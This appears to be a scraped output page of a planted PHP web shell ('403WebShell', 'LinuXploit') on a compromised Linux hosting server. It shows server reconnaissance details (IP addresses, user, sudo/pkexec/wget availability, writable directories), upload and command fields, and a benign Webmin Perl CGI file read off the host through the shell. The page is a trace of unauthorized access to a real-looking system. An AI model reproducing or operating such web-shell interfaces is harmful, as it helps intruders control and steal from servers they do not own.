Uname:Linux server2.hostofiraq.site 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64

Base Dir : /home/iscmbt-kufa-atu/public_html

User : iscmbt-kufa-atu


403WebShell
403Webshell
Server IP : 89.117.53.150  /  Your IP : 216.73.216.11
Web Server : Apache
System : Linux server2.hostofiraq.site 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
User : iscmbt-kufa-atu ( 1014)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/webmin/virtual-server/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/webmin/virtual-server/delete_postgrey.cgi
#!/usr/bin/perl
# Delete several greylisting whitelist entries

require './virtual-server-lib.pl';
&can_edit_templates() || &error($text{'postgrey_ecannot'});
&ReadParse();
&licence_status();
&error_setup($text{'delgrey_err'});
@d = split(/\0/, $in{'d'});
@d || &error($text{'delgrey_enone'});

# Delete them, in reverse index order
&obtain_lock_postgrey();
$data = &list_postgrey_data($in{'type'});
foreach $i (sort { $b <=> $a } @d) {
	$d = $data->[$i];
	$d || &error($text{'editgrey_gone'});
	&delete_postgrey_data($in{'type'}, $d);
	}
&release_lock_postgrey();
&apply_postgrey_data();
&run_post_actions_silently();

&webmin_log('deletes', 'postgrey', scalar(@d), { 'type' => $in{'type'} });

&redirect("postgrey.cgi?type=$in{'type'}");


Youez - 2016 - github.com/yon3zu
LinuXploit